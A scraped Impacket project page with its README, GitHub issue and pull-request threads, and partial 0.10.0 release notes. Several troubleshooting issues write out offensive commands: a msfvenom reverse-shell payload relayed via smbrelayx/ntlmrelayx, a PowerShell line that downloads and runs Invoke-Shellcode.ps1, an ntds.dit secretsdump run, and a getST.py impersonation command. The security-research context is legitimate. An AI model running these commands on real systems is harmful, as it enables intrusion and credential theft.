Impacket is a collection of Python classes for working with network protocols.

Overview

What is Impacket?

Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch, as well as parsed from raw data, and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.

A description of some of the tools can be found at: https://www.secureauth.com/labs/open-source-tools/impacket

What protocols are featured?

  • Ethernet, Linux "Cooked" capture.
  • IP, TCP, UDP, ICMP, IGMP, ARP.
  • IPv4 and IPv6 Support.
  • NMB and SMB1, SMB2 and SMB3 (high-level implementations).
  • MSRPC version 5, over different transports: TCP, SMB/TCP, SMB/NetBIOS and HTTP.
  • Plain, NTLM and Kerberos authentications, using password/hashes/tickets/keys.
  • Portions/full implementation of the following MSRPC interfaces: EPM, DTYPES, LSAD, LSAT, NRPC, RRP, SAMR, SRVS, WKST, SCMR, BKRP, DHCPM, EVEN6, MGMT, SASEC, TSCH, DCOM, WMI, OXABREF, NSPI, OXNSPI.
  • Portions of TDS (MSSQL) and LDAP protocol implementations.

Getting Impacket

Setup

Quick start

Grab the latest stable release, unpack it and run python3 -m pip install . (python2 -m pip install . for Python 2.x) from the directory where you placed it. Isn't that easy?

Installing

In order to install the source execute the following command from the directory where the Impacket's distribution has been unpacked: python3 -m pip install . (python2 -m pip install . for Python 2.x). This will install the classes into the default Python modules path; note that you might need special permissions to write there.

Testing

If you want to run the library test cases you need to do mainly three things:

  1. Install and configure a Windows 2012 R2 Domain Controller.
    • Be sure the RemoteRegistry service is enabled and running.
  2. Configure the dcetest.cfg file with the necessary information
  3. Install tox (python3 -m pip install tox)

Once that's done, you can run tox and wait for the results. If all goes well, all test cases should pass. You will also have a coverage HTML report located at impacket/tests/htlmcov/index.html

Docker Support

Build Impacket's image:

  docker build -t "impacket:latest" .

Using Impacket's image:

  docker run -it --rm "impacket:latest"

Licensing

This software is provided under a slightly modified version of the Apache Software License. See the accompanying LICENSE file for more information.

SMBv1 and NetBIOS support based on Pysmb by Michael Teo.

Disclaimer

The spirit of this Open Source initiative is to help security researchers, and the community, speed up research and educational activities related to the implementation of networking protocols and stacks.

The information in this repository is for research and educational purposes and not meant to be used in production environments and/or as part of commercial products.

If you desire to use this code or some part of it for your own uses, we recommend applying proper security development life cycle and secure coding practices, as well as generate and track the respective indicators of compromise according to your needs.

Contact Us

Whether you want to report a bug, send a patch, or give some suggestions on this package, drop us a few lines at [email protected].

For security-related questions check our security policy.

Comments
  • ConstraintsIntersection error when trying to use wmiexec.py with -k -no-pass?

    ConstraintsIntersection error when trying to use wmiexec.py with -k -no-pass?

    Hi all, after generating a golden ticket, I go to try and use the wmiexec.py example with the -k and -no-pass options, but I am getting a strange exception:

    ConstraintsIntersection(ConstraintsIntersection(), ConstraintsUnion(SingleValueConstraint(11), SingleValueConstraint(13))) failed at: ValueConstraintError('ConstraintsUnion(SingleValueConstraint(11), SingleValueConstraint(13)) failed at: ValueConstraintError('all of (SingleValueConstraint(11), SingleValueConstraint(13)) failed for "15"',)',) at Integer

    Did I generate my ticket incorrectly or something?

    opened by msftsecurityteam 36
  • Failed to Authenticating to the target use smbrelayx & ntlmrelayx and upload file

    Failed to Authenticating to the target use smbrelayx & ntlmrelayx and upload file

    Version impacket

    v0.9.23.dev1+20201203.125520.aa0c78ad

    Command line execution used

    python3 smbrelayx.py -h 192.168.43.83 -e ./metasploit_payload.exe (virus.exe)

    it same too if i use ntlmrelayx, eg: python3 ntlmrelayx.py -t 192.168.43.83 -e metasploit_payload.exe

    Metasploit payload i create

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.231 LPORT=4444 -o metasploit_payload.exe (virus.exe)

    Client version

    windows 7

    server version

    kali linux 2020.4

    Problem

    Hey, i want to relay authenthication from the client to the server(attacker) but the client not relay the aunthentication. When i allow the SMB share on the client \192.168.43.231. It show the message : Screenshot (259)

    Ok. now i want to test if the client can send the authentication. So if i able to capture it, yes, in that case i can deliver my metasploit_payload.exe to the target machine. But i can't capture the authentication. It show the message below: Screenshot (257)

    Sorry this only a question, because i don't now how to fix it. I read many blog but i'm still can't find a solution.

    opened by ricko2991 35
  • secretsdump.py - Error while calling getNextRow() (previously utf16 codec error)

    secretsdump.py - Error while calling getNextRow() (previously utf16 codec error)

    Hi,

    I'm having an issue with secretsdump.py on a ntds.dit file coming from a Windows Server 2016. When I run secretsdump.py on it:

    secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

    It returns the following:

    Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies
    
    [*] Target system bootKey: 0xc03fcc27eb232e8cf9aedfe9dccb2af8
    [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
    [*] Searching for pekList, be patient
    [-] Error while calling getNextRow(), trying the next one
    

    Previously, I was on the v.0.9.16-dev branch, and I had an utf16 codec error.

    Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies
    
    [*] Target system bootKey: 0xc03fcc27eb232e8cf9aedfe9dccb2af8
    [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
    [*] Searching for pekList, be patient
    [-] 'utf16' codec can't decode bytes in position 0-1: illegal encoding
    [*] Cleaning up...
    

    Is it possible that Impacket isn't updated to support the extraction of ntds.dit files from a Windows Server 2016 yet? I can provide all the logs, and debugging data needed (minus the actual ntds.dit and SYSTEM files, obviously).

    Thank you.

    opened by Aurakal 35
  • STATUS_INVALID_PARAMETER while connecting to cifs server.

    STATUS_INVALID_PARAMETER while connecting to cifs server.

    Hello,

    I've been long time user of impacket lib for smb2/3 ops purpose.

    I'm trying to connect to NetApp CIFS server using SMBConnection or SMB3 instance directly too.but i get invalid status error on below scenarios.

    I see that Negotiate request/response went well. Negotiate response {{{ Frame 174: 284 bytes on wire (2272 bits), 284 bytes captured (2272 bits) Ethernet II, Src: HewlettP_d7:5e:c0 (00:9c:02:d7:5e:c0), Dst: Apple_c6:56:be (78:31:c1:c6:56:be) Internet Protocol Version 4, Src: 10.1.9.175, Dst: 10.2.5.12 Transmission Control Protocol, Src Port: 445, Dst Port: 64322, Seq: 1, Ack: 111, Len: 218 NetBIOS Session Service SMB2 (Server Message Block Protocol version 2) SMB2 Header Negotiate Protocol Response (0x00) StructureSize: 0x0041 Security mode: 0x01, Signing enabled Dialect: 0x0202 NegotiateContextCount: 0 Server Guid: 00000015-b63d-0da0-c778-844ebee2a553 Capabilities: 0x00000001, DFS Max Transaction Size: 65536 Max Read Size: 65536 Max Write Size: 65536 Current Time: Dec 1, 2016 11:41:05.799077000 EST Boot Time: Sep 12, 2016 10:53:20.891304000 EDT Security Blob: 605406062b0601050502a04a3048a024302206092a864882... Offset: 0x00000080 Length: 86 GSS-API Generic Security Service Application Program Interface OID: 1.3.6.1.5.5.2 (SPNEGO - Simple Protected Negotiation) Simple Protected Negotiation negTokenInit mechTypes: 3 items MechType: 1.2.840.48018.1.2.2 (MS KRB5 - Microsoft Kerberos 5) MechType: 1.2.840.113554.1.2.2 (KRB5 - Kerberos 5) MechType: 1.3.6.1.4.1.311.2.2.10 (NTLMSSP - Microsoft NTLM Security Support Provider) negHints hintName: [email protected]_name <-- hided on purpose NegotiateContextOffset: 0x0000 }}}

    Session setup request {{{ Frame 207: 224 bytes on wire (1792 bits), 224 bytes captured (1792 bits) Ethernet II, Src: Apple_c6:56:be (78:31:c1:c6:56:be), Dst: HewlettP_d7:5e:c0 (00:9c:02:d7:5e:c0) Internet Protocol Version 4, Src: 10.2.5.12, Dst: 10.1.9.175 Transmission Control Protocol, Src Port: 64322, Dst Port: 445, Seq: 111, Ack: 219, Len: 158 NetBIOS Session Service SMB2 (Server Message Block Protocol version 2) SMB2 Header Session Setup Request (0x01) StructureSize: 0x0019 Flags: 0 Security mode: 0x01, Signing enabled Capabilities: 0x00000001, DFS Channel: None (0x00000000) Previous Session Id: 0x0000000000000000 Security Blob: 604006062b0601050502a0363034a00e300c060a2b060104... Offset: 0x00000058 Length: 66 GSS-API Generic Security Service Application Program Interface OID: 1.3.6.1.5.5.2 (SPNEGO - Simple Protected Negotiation) Simple Protected Negotiation negTokenInit mechTypes: 1 item MechType: 1.3.6.1.4.1.311.2.2.10 (NTLMSSP - Microsoft NTLM Security Support Provider) mechToken: 4e544c4d5353500001000000078208200000000000000000... NTLM Secure Service Provider NTLMSSP identifier: NTLMSSP NTLM Message Type: NTLMSSP_NEGOTIATE (0x00000001) Negotiate Flags: 0x20088207, Negotiate 128, Negotiate Extended Security, Negotiate NTLM key, Request Target, Negotiate OEM, Negotiate UNICODE Calling workstation domain: NULL Calling workstation name: NULL }}}

    Session setup response. {{{ Frame 208: 143 bytes on wire (1144 bits), 143 bytes captured (1144 bits) Ethernet II, Src: HewlettP_d7:5e:c0 (00:9c:02:d7:5e:c0), Dst: Apple_c6:56:be (78:31:c1:c6:56:be) Internet Protocol Version 4, Src: 10.1.9.175, Dst: 10.2.5.12 Transmission Control Protocol, Src Port: 445, Dst Port: 64322, Seq: 219, Ack: 269, Len: 77 NetBIOS Session Service SMB2 (Server Message Block Protocol version 2) SMB2 Header Server Component: SMB2 Header Length: 64 Credit Charge: 0 NT Status: STATUS_INVALID_PARAMETER (0xc000000d) Command: Session Setup (1) Credits granted: 0 Flags: 0x00000001, Response Chain Offset: 0x00000000 Message ID: 0 Process Id: 0x00000000 Tree Id: 0x00000000 Session Id: 0x0000000000000000 Signature: 00000000000000000000000000000000 [Response to: 207] [Time from request: 0.002369000 seconds] Session Setup Response (0x01) StructureSize: 0x0009 Session Flags: 0x0000 Security Blob: : NO DATA Offset: 0x00000000 Length: 0 }}}

    Scenario : 1 NetApp server with SMB2 dialect, login fails. `{

    c = SMBConnection(remoteName='netapp-server', remoteHost='10.1.9.175', myName=None, sess_port=445, preferredDialect=514) c.login("user1", "password1", "domain1") Traceback (most recent call last): File "", line 1, in File "/usr/local/lib/python2.7/site-packages/impacket/smbconnection.py", line 264, in login raise SessionError(e.get_error_code()) SessionError: SMB SessionError: STATUS_INVALID_PARAMETER(An invalid parameter was passed to a service or function.)`

    I connect to our private CIFS server successfully when i provide valid dialect. `{

    c = SMBConnection(remoteName='local-1', remoteHost='10.1.29.12', myName=None, sess_port=445, preferredDialect=514) c.login("user1", "password1", "domain1") True c.getDialect() 514 <--- SMB2`

    Scenario: 2 Local server: If i dont provide preferredDialect then it fails in negotiation step itself.

    `{

    c = SMBConnection(remoteName='local-1', remoteHost='10.1.29.12', myName=None, sess_port=445, preferredDialect=None) Traceback (most recent call last): File "", line 1, in File "/usr/local/lib/python2.7/site-packages/impacket/smbconnection.py", line 74, in init self.negotiateSession(preferredDialect) File "/usr/local/lib/python2.7/site-packages/impacket/smbconnection.py", line 118, in negotiateSession session=self._nmbSession, preferredDialect=514) File "/usr/local/lib/python2.7/site-packages/impacket/smb3.py", line 242, in init self.negotiateSession(preferredDialect) File "/usr/local/lib/python2.7/site-packages/impacket/smb3.py", line 458, in negotiateSession ans = self.recvSMB(packetID) File "/usr/local/lib/python2.7/site-packages/impacket/smb3.py", line 381, in recvSMB data = self._NetBIOSSession.recv_packet(self._timeout) File "/usr/local/lib/python2.7/site-packages/impacket/nmb.py", line 854, in recv_packet data = self.__read(timeout) File "/usr/local/lib/python2.7/site-packages/impacket/nmb.py", line 932, in __read data = self.read_function(4, timeout) File "/usr/local/lib/python2.7/site-packages/impacket/nmb.py", line 921, in non_polling_read raise NetBIOSError, ('Error while reading from remote', ERRCLASS_OS, None) NetBIOSError: Error while reading from remote`

    NetApp cifs server with no preferredDialect STATUS_INVALID_PARAMETER. So it actually reads from the socket but gets unexpected status in negotiation phase. `{

    c = SMBConnection(remoteName='netapp-server', remoteHost='10.1.9.175', myName=None, sess_port=445, preferredDialect=None) Traceback (most recent call last): File "", line 1, in File "/usr/local/lib/python2.7/site-packages/impacket/smbconnection.py", line 74, in init self.negotiateSession(preferredDialect) File "/usr/local/lib/python2.7/site-packages/impacket/smbconnection.py", line 118, in negotiateSession session=self._nmbSession, preferredDialect=514) File "/usr/local/lib/python2.7/site-packages/impacket/smb3.py", line 242, in init self.negotiateSession(preferredDialect) File "/usr/local/lib/python2.7/site-packages/impacket/smb3.py", line 459, in negotiateSession if ans.isValidAnswer(STATUS_SUCCESS): File "/usr/local/lib/python2.7/site-packages/impacket/smb3structs.py", line 430, in isValidAnswer raise smb3.SessionError(self['Status'], self) SessionError: SMB SessionError: STATUS_INVALID_PARAMETER(An invalid parameter was passed to a service or function.)`

    Settings on NetApp server {{{ netapp-server> options cifs.smb2 cifs.smb2.enable on cifs.smb2.signing.max_threads 0 cifs.smb2.signing.multiprocessing disabled cifs.smb2.signing.required off cifs.smb2_1.branch_cache.enable off cifs.smb2_1.branch_cache.hash_time_out 3600 (value might be overwritten in takeover) netapp-server> options cifs.signing cifs.signing.enable off }}}

    I have compared pcap from mac/windows while connecting to cifs server using libsmb.py haven't found any field that is wrong or unexpected. I have also checked NTLMSSP flags and tried variations to see if there is any unsupported flag. but luck.

    I can connect to same cifs servers from windows 7 using smb2.

    Any help would be appreciated, where to look or if am i missing any setting on server side.

    Thank you.

    opened by contactr2m 31
  • Python3 support

    Python3 support

    We should add Python3 support for the library. Ideally, the same codebase should run on both versions.

    I've just created a python3 branch to work on porting the existing code.

    structure.py, which is a core component for the library, seems to be working on Python3 now. A lot of testing is needed tho.

    PRs welcomed!

    enhancement help wanted 
    opened by asolino 31
  • ntlmrelayx: socket ssl wrapping error

    ntlmrelayx: socket ssl wrapping error

    Hi!

    I'm facing the issue when using relay for LDAPs traffic. Whole exception with -debug flug:

    [-] Exception in HTTP request handler: ('unable to open socket', [(LDAPSocketOpenError('socket ssl wrapping error: [Errno 104] Connection reset by peer',), ('A.B.C.D', 636))]) [+] Traceback (most recent call last): File "build/bdist.linux-x86_64/egg/impacket/examples/ntlmrelayx/servers/httprelayserver.py", line 72, in handle_one_request SimpleHTTPServer.SimpleHTTPRequestHandler.handle_one_request(self) File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request method() File "build/bdist.linux-x86_64/egg/impacket/examples/ntlmrelayx/servers/httprelayserver.py", line 193, in do_GET if not self.do_ntlm_negotiate(token, proxy=proxy): File "build/bdist.linux-x86_64/egg/impacket/examples/ntlmrelayx/servers/httprelayserver.py", line 261, in do_ntlm_negotiate if not self.client.initConnection(): File "build/bdist.linux-x86_64/egg/impacket/examples/ntlmrelayx/clients/ldaprelayclient.py", line 144, in initConnection self.session.open(False) File "/usr/local/lib/python2.7/dist-packages/ldap3/strategy/sync.py", line 56, in open BaseStrategy.open(self, reset_usage, read_server_info) File "/usr/local/lib/python2.7/dist-packages/ldap3/strategy/base.py", line 147, in open raise LDAPSocketOpenError('unable to open socket', exception_history) LDAPSocketOpenError: ('unable to open socket', [(LDAPSocketOpenError('socket ssl wrapping error: [Errno 104] Connection reset by peer',), ('A.B.C.D', 636))])

    System:

    • Python 2.7.15+
    • up to date Kali
    • up to date impacket
    • ldap3 tested both 2.5.1 and 2.5.2

    Same problem was slightly touched in #514, where @dirkjanm mentioned:

    (..) it has something to do with whether the SSL certificates are set correctly on the server. Usually targeting another DC worked

    I have access to ~12 AD systems (2012 R2 and 2016), targeting any of them results into this error. Connections using ldp.exe works well (along with many production calls to some of ADs): image

    LDAP signing not enabled: image

    Behavior is that LDAPs service RST connection just after TLS hello is received: image

    So this is not caused by ntlmrelayx not trusting LDAPs sertificate - it's about LDAPs refusing this TLS hello packet.

    Any ideas?

    opened by dtrizna 29
  • samrdump import issue

    samrdump import issue

    What steps will reproduce the problem?
    1. Download the 0.9.9.9.9 version
    2. run setup.py install
    3. run samrdump.py <ip>
    
    What is the expected output? What do you see instead?
    The normal smb enumeration info are expected, but it returns:
    
    Traceback (most recent call last):
      File "/usr/local/bin/samrdump.py", line 24, in <module>
        from impacket import uuid, version
    ImportError: cannot import name version
    
    
    What version of the product are you using? On what operating system?
    The last one (impacket-0.9.9.9.tar.gz) - Linux Backtrack 5r3
    
    Please provide any additional information below.
    
    

    Original issue reported on code.google.com by [email protected] on 18 Jan 2013 at 1:57

    opened by GoogleCodeExporter 27
  • add no-pac exploit attack (s4u2self only) and add service modification feature to examples/getST.py

    add no-pac exploit attack (s4u2self only) and add service modification feature to examples/getST.py

    I'm playing with no-pac exploitation recently, the last step is doing a s4u2self request, and we don't need to do s4u2proxy request. But I found that impacket's getST.py has no support for this, and it doesn't support service modification of the returned TGS ticket. Even there is a feature called AnySPN in impacket, but it won't work in this special situation here is the result of smbclient.py before my modification to getST.py image

    after I made some changes to getST.py, I'm able to get a service ticket with the SPN I specified in the command line

    getST.py my.domain/WIN-ER6H1V81DV9 -no-pass -k -dc-ip 192.168.25.177 -impersonate Administrator -alt-service CIFS/WIN-ER6H1V81DV9.my.domain -s4u2self -spn WIN-ER6H1V81DV9 -debug smbclient.py works just fine image

    opened by wqreytuk 26
  • Review of NTLM reflection attack over network

    Review of NTLM reflection attack over network

    HI all,

    I'm a little bit confused of what are the options for a reflection attack (NTLM auth back to the victim which is different from a general relay attack) on an up-to-date W10 host. Let me explain what i have understand :

    • SMB NTLM auth reflect back to SMB is patched since 2008 (MS08-068)
    • NTLM auth reflect back to SMB (like HTTP => SMB) is patched since 2016. This was the goal of Hot Potato by @breenmachine
    • DCOM DCE (via BITS) to RPC endpoint (TCP port 135) is still working (RottenPotato by @breenmachine or lonelypotato by @decoder-it) Ok, but demo of these attacks is always done on the victim's host (loopback @IP). Well, my questions are:
    • Is it possible to manage these reflection attack (or another) over the local network on an fully update W10 host?
    • Does Impacket implement these attacks ? I know that @asolino and @dirkjanm discussed about it in an 2 years old issue (https://github.com/CoreSecurity/impacket/issues/188#issue-170611239) but conclusion was quite unclear for me.

    Regards,

    Rémi

    opened by remi-cc 26
  • utf-8 issues with examples

    utf-8 issues with examples

    Hello @asolino, I'll use this thread to report various utf-8 issues :)

    Let's start with smbclient.py:

    $ smbclient.py <login>:<pwd>@192.168.11.144
    # shares
    ADMIN$
    C$
    IPC$
    NETLOGON
    share
    SYSVOL
    àéyoloshare
    # cd àéyoloshare
    [-] 'utf8' codec can't decode byte 0x85 in position 3: invalid start byte
    

    I know utf handling is a pain...That's a long struggle with CrackMapExec (hello @byt3bl33d3r) :)

    Cheers !

    bug help wanted 
    opened by maaaaz 25
  • smbserver: Connection reset by peer && command not implemented

    smbserver: Connection reset by peer && command not implemented

    Hey man!

    I'm currently trying to download powershell scripts over smb on Windows 10 using the following command:

    IEX (New-Object Net.WebClient).DownloadString("file://172.16.112.1/TMP/Invoke-Shellcode.ps1");
    

    smbserver.py and my custom smb server class give me the following output:

    2015-10-31 18:54:11 Config file parsed
    2015-10-31 18:54:11 Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
    2015-10-31 18:54:11 Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
    2015-10-31 18:54:17 Incoming connection (172.16.112.130,51854)
    2015-10-31 18:54:17 Not implemented command: 0x0
    2015-10-31 18:54:17 Handle: [Errno 104] Connection reset by peer
    2015-10-31 18:54:17 Closing down connection (172.16.112.130,51854)
    

    Let me know if you need some additional information.

    Cheers

    opened by byt3bl33d3r 19
  • Add dissect.esedb compatibility to secretsdump

    Add dissect.esedb compatibility to secretsdump

    See #1448. I'm not sure how tightly integrated you'd want this to be in impacket, so I opted for a simple compatibility shim. This can of course be changed to a full replacement of the existing ESE implementation.

    This should bring a considerable performance improvement to secretsdump. My sample AD with only 3 users already sees an improvement (1s vs 2s), but in the past we've seen domains with over 100k users take less than a minute, whereas the original secretsdump would take >24 hours.

    @dirkjanm

    https://github.com/fox-it/dissect.esedb

    opened by Schamper 0
  • Feature: ntlmrelayx include --use-vss for secretsdump

    Feature: ntlmrelayx include --use-vss for secretsdump

    During a client engagement I noticed that, when relaying a valid domain admin account to a domain controller (which has signing disabled) and attempting to dump credentials using secretsdump (default action when -c parameter is not specified), it fails for NTDS dit.

    To fix this, I had to run socks and then run secretsdump using --use-vss. Any chance custom parameters can be included in ntlmrelayx when secretsdump is ran?

    opened by KaynRO 0
  • Allow weak TLS ciphers for LDAP connections

    Allow weak TLS ciphers for LDAP connections

    In Python3.10, the default TLS cipher settings have been set to a more secure level. See: https://bugs.python.org/issue43998

    The change makes sense for general users, but Impacket is regularly used to access old Windows computers that present certs signed using MD5 or don't support anything higher than TLSv1.0. Impacket users arguably care more about exploiting weaknesses than requiring super secure TLS settings, so this patch lowers the cipher settings to the lowest value. This is in line with the current behavior of not validating certificates at all.

    Note that this will not help if the TLS handshake fails due to certificate issues until this bug is fixed in ldap3: https://github.com/cannatag/ldap3/pull/1067

    opened by AdrianVollmer 0
  • secretsdump implementation with dissect.esedb

    secretsdump implementation with dissect.esedb

    opened by maaaaz 6
  • Can't get Name property from MSCluster_Node, the output gets garbled

    Can't get Name property from MSCluster_Node, the output gets garbled

    Configuration

    impacket version: v0.10.0 Python version: Python 3.6.8 Target OS: WMI 6.3.9600 | 2012R2

    Debug Output With Command String

    /opt/python-virtualenv/impacket/bin/wmiquery.py -debug 'AD/USER:[email protected]' -namespace root/mscluster -rpc-auth-level privacy -f <( echo 'SELECT Name FROM MSCluster_Node' ) Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

    [+] Impacket Library Installation Path: /opt/python-virtualenv/impacket/lib/python3.6/site-packages/impacket [+] Target system is SERVERIP and isFQDN is False [+] StringBinding: SERVERNAME[24158] [+] StringBinding: SERVERIP[24158] [+] StringBinding chosen: ncacn_ip_tcp:SERVERIP[24158] WQL> SELECT Name FROM MSCluster_Node Traceback (most recent call last): File "/usr/lib64/python3.6/cmd.py", line 214, in onecmd func = getattr(self, 'do_' + cmd) AttributeError: 'WMIQUERY' object has no attribute 'do_SELECT'

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last): File "/opt/python-virtualenv/impacket/bin/wmiquery.py", line 84, in printReply pEnum = iEnum.Next(0xffffffff,1)[0] File "/opt/python-virtualenv/impacket/lib/python3.6/site-packages/impacket/dcerpc/v5/dcom/wmi.py", line 2951, in Next oxid=self.get_oxid(), target=self.get_target()), self.__iWbemServices)) File "/opt/python-virtualenv/impacket/lib/python3.6/site-packages/impacket/dcerpc/v5/dcom/wmi.py", line 2328, in init self.encodingUnit = ENCODING_UNIT(objRef['pObjectData']) File "/opt/python-virtualenv/impacket/lib/python3.6/site-packages/impacket/structure.py", line 87, in init self.fromString(data) File "/opt/python-virtualenv/impacket/lib/python3.6/site-packages/impacket/structure.py", line 152, in fromString self[field[0]] = self.unpack(field[1], data[:size], dataClassOrCode = dataClassOrCode, field = field[0]) File "/opt/python-virtualenv/impacket/lib/python3.6/site-packages/impacket/structure.py", line 382, in unpack return dataClassOrCode(data) File "/opt/python-virtualenv/impacket/lib/python3.6/site-packages/impacket/dcerpc/v5/dcom/wmi.py", line 895, in init self.fromString(data) File "/opt/python-virtualenv/impacket/lib/python3.6/site-packages/impacket/structure.py", line 152, in fromString self[field[0]] = self.unpack(field[1], data[:size], dataClassOrCode = dataClassOrCode, field = field[0]) File "/opt/python-virtualenv/impacket/lib/python3.6/site-packages/impacket/structure.py", line 382, in unpack return dataClassOrCode(data) File "/opt/python-virtualenv/impacket/lib/python3.6/site-packages/impacket/dcerpc/v5/dcom/wmi.py", line 795, in init Structure.init(self, data, alignment) File "/opt/python-virtualenv/impacket/lib/python3.6/site-packages/impacket/structure.py", line 87, in init self.fromString(data) File "/opt/python-virtualenv/impacket/lib/python3.6/site-packages/impacket/structure.py", line 152, in fromString self[field[0]] = self.unpack(field[1], data[:size], dataClassOrCode = dataClassOrCode, field = field[0]) File "/opt/python-virtualenv/impacket/lib/python3.6/site-packages/impacket/structure.py", line 382, in unpack return dataClassOrCode(data) File "/opt/python-virtualenv/impacket/lib/python3.6/site-packages/impacket/structure.py", line 87, in init self.fromString(data) File "/opt/python-virtualenv/impacket/lib/python3.6/site-packages/impacket/structure.py", line 152, in fromString self[field[0]] = self.unpack(field[1], data[:size], dataClassOrCode = dataClassOrCode, field = field[0]) File "/opt/python-virtualenv/impacket/lib/python3.6/site-packages/impacket/structure.py", line 382, in unpack return dataClassOrCode(data) File "/opt/python-virtualenv/impacket/lib/python3.6/site-packages/impacket/dcerpc/v5/dcom/wmi.py", line 765, in init raise Exception("self['InstPropQualSetFlag'] == 2") Exception: ("self['InstPropQualSetFlag'] == 2", "When unpacking field 'InstancePropQualifierSet | : | b'\x02\x1e\x1f\x11\x08-7\x11\x03\x03E\x80MSCluster_NodeNODESERVER01PropertyNameNodeNamePropertyType\x1c\x02\x80MSCluster_NodeNODESERVER01PropertyNameNodeNamePropertyType'[:5904]'", "When unpacking field 'InstanceQualifierSet | : | b'\x04\x02\x1e\x1f\x11\x08-7\x11\x03\x03E\x80MSCluster_NodeNODESERVER01PropertyNameNodeNamePropertyType\x1c\x02\x80MSCluster_NodeNODESERVER01PropertyNameNodeNamePropertyType'[:5908]'", "When unpacking field 'InstanceType | : | b'\xef\x05\x046\x07\x80\x01\x0b\xff\xff\x10\x03\t\x04\x06\x80\x08\x18-\x083\x01[a\x03\x93\x80MSCluster_NodeLocaleMS_CLUSTER_PROVIDERUUID{C306EBED-0654-4360-AA70-DE912C5FC364}Name\x08@\x1c\n\x80#\x08\x8b\x01\x803\x0b\xff\xffstringz\x10\x04\x02\x1e\x1f\x11\x08-7\x11\x03\x03E\x80MSCluster_NodeNODESERVER01PropertyNameNodeNamePropertyType\x1c\x02\x80MSCluster_NodeNODESERVER01PropertyNameNodeNamePropertyType'[:6161]'", "When unpacking field 'ObjectBlock | : | b'\x12\xef\x05\x046\x07\x80\x01\x0b\xff\xff\x10\x03\t\x04\x06\x80\x08\x18-\x083\x01[a\x03\x93\x80MSCluster_NodeLocaleMS_CLUSTER_PROVIDERUUID{C306EBED-0654-4360-AA70-DE912C5FC364}Name\x08@\x1c\n\x80#\x08\x8b\x01\x803\x0b\xff\xffstringz\x10\x04\x02\x1e\x1f\x11\x08-7\x11\x03\x03E\x80MSCluster_NodeNODESERVER01PropertyNameNodeNamePropertyType\x1c\x02\x80MSCluster_NodeNODESERVER01PropertyNameNodeNamePropertyType'[:6162]'") [-] ("self['InstPropQualSetFlag'] == 2", "When unpacking field 'InstancePropQualifierSet | : | b'\x02\x1e\x1f\x11\x08-7\x11\x03\x03E\x80MSCluster_NodeNODESERVER01PropertyNameNodeNamePropertyType\x1c\x02\x80MSCluster_NodeNODESERVER01PropertyNameNodeNamePropertyType'[:5904]'", "When unpacking field 'InstanceQualifierSet | : | b'\x04\x02\x1e\x1f\x11\x08-7\x11\x03\x03E\x80MSCluster_NodeNODESERVER01PropertyNameNodeNamePropertyType\x1c\x02\x80MSCluster_NodeNODESERVER01PropertyNameNodeNamePropertyType'[:5908]'", "When unpacking field 'InstanceType | : | b'\xef\x05\x046\x07\x80\x01\x0b\xff\xff\x10\x03\t\x04\x06\x80\x08\x18-\x083\x01[a\x03\x93\x80MSCluster_NodeLocaleMS_CLUSTER_PROVIDERUUID{C306EBED-0654-4360-AA70-DE912C5FC364}Name\x08@\x1c\n\x80#\x08\x8b\x01\x803\x0b\xff\xffstringz\x10\x04\x02\x1e\x1f\x11\x08-7\x11\x03\x03E\x80MSCluster_NodeNODESERVER01PropertyNameNodeNamePropertyType\x1c\x02\x80MSCluster_NodeNODESERVER01PropertyNameNodeNamePropertyType'[:6161]'", "When unpacking field 'ObjectBlock | : | b'\x12\xef\x05\x046\x07\x80\x01\x0b\xff\xff\x10\x03\t\x04\x06\x80\x08\x18-\x083\x01[a\x03\x93\x80MSCluster_NodeLocaleMS_CLUSTER_PROVIDERUUID{C306EBED-0654-4360-AA70-DE912C5FC364}Name\x08@\x1c\n\x80#\x08\x8b\x01\x803\x0b\xff\xffstringz\x10\x04\x02\x1e\x1f\x11\x08-7\x11\x03\x03E\x80MSCluster_NodeNODESERVER01PropertyNameNodeNamePropertyType\x1c\x02\x80MSCluster_NodeNODESERVER01PropertyNameNodeNamePropertyType'[:6162]'")

    Additional context

    It seem, when you try to get the Names of the nodes from MSCluster_Node class it breaks. It is only for the "Name" property. Thise where repalce to sanitize the output AD/USER:[email protected], SERVERIP, SERVERNAME, NODESERVERNAME, NODESERVER01. There was alot of "\x00" in the output that I removed to reduce it.

    opened by Mysteoa 0
Releases(impacket_0_10_0)
  • impacket_0_10_0(May 4, 2022)

    Project's main page at https://www.secureauth.com/labs/open-source-tools/impacket/

    ChangeLog for 0.10.0:

    1. Library improvements

      • Dropped support for Python 2.7.
      • Refactored the testing infrastructure (@martingalloar):
        • Added pytest as the testing framework to organize and mark test cases. Tox remain as the automation framework, and Coverage.py for measuring code coverage.
        • Custom bash scripts were replaced with test cases auto-discovery.
        • Local and remote test cases were marked for easy run and configuration.
        • DCE/RPC endpoint test cases were refactored and moved to a new layout.
        • An initial testing guide with the main steps to prepare a testing environment and run them.
        • Fixed a good amount of DCE/RPC endpoint test cases that were failing.
        • Added tests for [MS-PAR], [MS-RPRN], CCache and DPAPI.
      • Added a function to compute the Netlogon Authenticator at client-side in [MS-NRPC] (@0xdeaddood)
      • Added [MS-DSSP] protocol implementation (@simondotsh)
      • Added GetDriverDirectory functions to [MS-PAR] and [MS-RPRN] (@raithedavion)
      • Refactored the Credential Cache:
        • Added new parseFile function to ccache.py (@rmaksimov)
        • Added support for loading CCache Version 3 (@reznok)
        • Modified fromKRBCRED function used to load a Kirbi file (@0xdeaddood)
        • Fixed Ccache to Kirbi conversion (@ShutdownRepo)
      • Fixed default NTLM server challenge in smbserver (@rtpt-jonaslieb)
    2. Examples improvements

      • exchanger.py:
        • Fixed a bug when a Global Address List doesn't exist on the server (@mohemiv)
      • mimikatz.py
